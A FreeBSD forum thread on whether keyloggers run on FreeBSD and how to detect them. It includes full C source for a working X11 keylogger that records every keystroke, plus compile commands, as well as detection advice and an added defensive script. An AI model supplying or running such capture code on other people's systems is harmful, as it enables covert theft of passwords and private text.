# keylogger for FreeBSD



## mfaridi (Apr 25, 2010)

Can a keylogger work on FreeBSD and print everything we do?
Can I find the best packages to detect a keylogger?


----------



## SirDice (Apr 25, 2010)

Yes, a keylogger is possible.

security/rkhunter may be able to find one.


----------



## expl (Apr 25, 2010)

If it is a custom keylogger, automated tools have a low chance of detecting it.


----------



## lme@ (Apr 26, 2010)

This is a simple keylogger example:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>


static Display *dpy;
static Window focuswin = None;

static void attach_to_focuswin(void) {
        int foo = 0;

        XGetInputFocus(dpy, &focuswin, &foo);

        if (focuswin != None)
                XSelectInput(dpy, focuswin, KeyPressMask | FocusChangeMask);
        else
                sleep(1);
}

static void handle_event(void) {
        XEvent ev;
        char buf[100];
        int len;

        XNextEvent(dpy, &ev);
        if(ev.xany.type == FocusOut)
                focuswin = None;
        else if (ev.xany.type == KeyPress) {
                len = XLookupString(&ev.xkey, buf, 99, 0, 0);
                buf[len] = 0;
                printf("%s", buf);
                fflush(stdout);
        }
}

int main(void) {
        dpy = XOpenDisplay(getenv("DISPLAY"));
        if (dpy == NULL) {
                fprintf(stderr, "cannot change display\n");
                exit(1);
        }
        while (1) {
                if (focuswin == None)
                        attach_to_focuswin();
                else
                        handle_event();
        }
}
```


----------



## mfaridi (Apr 26, 2010)

lme@ said:

> This is a simple keylogger example:
> 
> ```
> #include <stdio.h>
> ...
> ```

My experience with programming and shell scripts is so low; can you describe what this script can do?


----------



## SirDice (Apr 26, 2010)

mfaridi said:

> can you describe what this script can do?


If I'm not mistaken it's C source code for an Xorg keylogger :e

Why are you worried about keyloggers? If an attacker is able to install one you have way more serious problems to worry about.


----------



## lme@ (Apr 26, 2010)

mfaridi said:

> My experience with programming and shell scripts is so low; can you describe what this script can do?



You need to compile this with a C compiler and start it. Then it logs everything you type in X.


----------



## mfaridi (Apr 26, 2010)

lme@ said:

> You need to compile this with a C compiler and start it. Then it logs everything you type in X.

I am sure this is a hard request, but how can I compile it with a C compiler and use it after that?


----------



## SirDice (Apr 26, 2010)

mfaridi said:

> but how can I compile it with a C compiler and use it after that?


If you're asking this then this code is not for you. 

Beware that lme@ gave you an _example_ of a keylogger on FreeBSD. You asked if it was possible and it certainly is.


----------



## mfaridi (Apr 26, 2010)

SirDice said:

> If you're asking this then this code is not for you.
> 
> Beware that lme@ gave you an _example_ of a keylogger on FreeBSD. You asked if it was possible and it certainly is.

OK, I understand, but I want to get some experience with compiling this script with a C compiler.


----------



## z662 (Apr 27, 2010)

To compile it, just run

```
gcc [insert name of program here]
```

Obviously you should omit the brackets, e.g.

```
gcc keyLogger.c
```


----------



## z662 (Apr 27, 2010)

Just out of curiosity, why did you post this thread in the Firewalls section?


----------



## mfaridi (Apr 27, 2010)

z662 said:

> To compile it, just run
> 
> ...

I ran that and I see this error:

```
ky.c:4:22: error: X11/Xlib.h: No such file or directory
ky.c:5:27: error: X11/Intrinsic.h: No such file or directory
ky.c:8: error: expected '=', ',', ';', 'asm' or '__attribute__' before '*' token
ky.c:9: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'focuswin'
ky.c: In function 'attach_to_focuswin':
ky.c:14: error: 'dpy' undeclared (first use in this function)
ky.c:14: error: (Each undeclared identifier is reported only once
ky.c:14: error: for each function it appears in.)
ky.c:14: error: 'focuswin' undeclared (first use in this function)
ky.c:16: error: 'None' undeclared (first use in this function)
ky.c:17: error: 'KeyPressMask' undeclared (first use in this function)
ky.c:17: error: 'FocusChangeMask' undeclared (first use in this function)
ky.c: In function 'handle_event':
ky.c:23: error: 'XEvent' undeclared (first use in this function)
ky.c:23: error: expected ';' before 'ev'
ky.c:27: error: 'dpy' undeclared (first use in this function)
ky.c:27: error: 'ev' undeclared (first use in this function)
ky.c:28: error: 'FocusOut' undeclared (first use in this function)
ky.c:29: error: 'focuswin' undeclared (first use in this function)
ky.c:29: error: 'None' undeclared (first use in this function)
ky.c:30: error: 'KeyPress' undeclared (first use in this function)
ky.c: In function 'main':
ky.c:39: error: 'dpy' undeclared (first use in this function)
ky.c:45: error: 'focuswin' undeclared (first use in this function)
ky.c:45: error: 'None' undeclared (first use in this function)
```


----------



## z662 (Apr 27, 2010)

Well, you first need to grab your copies of the X11 header files that you are including. That should get you pointed in the right direction.


----------



## expl (Apr 27, 2010)

`cc -o keylogger -I/usr/local/include -L/usr/local/lib -lX11 source.c`


----------



## mfaridi (Apr 28, 2010)

expl said:

> `cc -o keylogger -I/usr/local/include -L/usr/local/lib -lX11 source.c`

Can you describe this a little?


----------



## Beastie (Apr 28, 2010)

gcc(1)


----------



## janerysong (Nov 11, 2013)

SirDice said:

> If I'm not mistaken it's C source code for an Xorg keylogger :e
> 
> Why are you worried about keyloggers? If an attacker is able to install one you have way more serious problems to worry about.

Keyloggers are hard to detect manually. You will not notice the presence of such a program. It is invisible in the Task List (when you press Ctrl-Alt-Del). It will not show in the Task Bar, let alone your Desktop. It does not make any noise, and your system will not slow down as in the case of spyware.


----------



## janerysong (Nov 11, 2013)

expl said:

> If it is Myjad keylogger automated tools have low chance of detecting them.

Scan for viruses, then install anti-keylogger software, then change your password.


----------



## kpa (Nov 11, 2013)

@janerysong. This thread is about keyloggers under the FreeBSD operating system and you're referring to Microsoft Windows in what you posted. I see that you are new here but please pay more attention when replying to threads that are over three years old and stay on topic.


----------



## zspider (Nov 20, 2013)

If someone has gotten far enough that they've been able to install a keylogger, it's likely that's the least of your worries. Physical security is a must.


----------



## marwis (Nov 20, 2013)

Also, software keyloggers are not the only ones to worry about. Hardware keyloggers are orders of magnitude harder to detect. With some, it might not be possible at all to detect them from the operating system's point of view.

You could install webcams to have a 360-degree view of your system and make sure 1. nothing is being attached, and 2. your recordings are not being altered. Even then, you wouldn't have 100% assurance that you are "secure".

I'm turning my paranoid mode off now :h .


----------
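
A detection angle for the X11 example posted earlier in the thread, added here as an example and not written by any of the posters: a program like that has to hold a client connection to the X server socket, so listing local X clients and comparing them with what you expect to be running gives a quick triage list. The function name, the allowlist and the sample lines are constructed, and the column layout assumed is that of FreeBSD `sockstat -u`; clients connecting to X over TCP are not covered.

```shell
#!/bin/sh
# Added example: report local X11 clients whose command name is not expected.
# Assumed input layout (FreeBSD `sockstat -u`):
#   USER COMMAND PID FD PROTO LOCAL-ADDRESS [FOREIGN-ADDRESS]
# A client end of a connection appears as "-> /tmp/.X11-unix/X<n>".

# unexpected_x_clients "cmd1 cmd2 ..."  < sockstat-output
# Prints "USER COMMAND PID" once per process that is connected to an X
# server socket and whose command name is not in the allowlist.
unexpected_x_clients() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        NR == 1 && $1 == "USER" { next }          # skip the header line
        {
            for (i = 6; i < NF; i++)
                if ($i == "->" && $(i + 1) ~ /^\/tmp\/\.X11-unix\/X[0-9]+$/) {
                    key = $1 " " $2 " " $3
                    # A command name is only a triage hint: it can be chosen
                    # freely, so check the binary path of anything unfamiliar.
                    if (!($2 in ok) && !(key in seen)) { seen[key] = 1; print key }
                }
        }'
}

# Constructed sample in the assumed layout (not captured from a real host).
sample_sockstat() {
cat <<'EOF'
USER     COMMAND     PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     Xorg        912   1  stream /tmp/.X11-unix/X0
alice    xterm       1040  3  stream -> /tmp/.X11-unix/X0
alice    firefox     1102  4  stream -> /tmp/.X11-unix/X0
alice    firefox     1102  9  stream -> /tmp/.X11-unix/X0
alice    a.out       1377  3  stream -> /tmp/.X11-unix/X0
alice    dbus-daemon 980   5  stream /var/run/dbus/system_bus_socket
EOF
}

# Live use on a FreeBSD desktop:
#   sockstat -u | unexpected_x_clients "xterm firefox"
```

With the constructed sample and the allowlist `"xterm firefox"`, the only process reported is the unnamed `a.out` client. A clean result only means every X client has an expected name, not that each one is what it claims to be.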

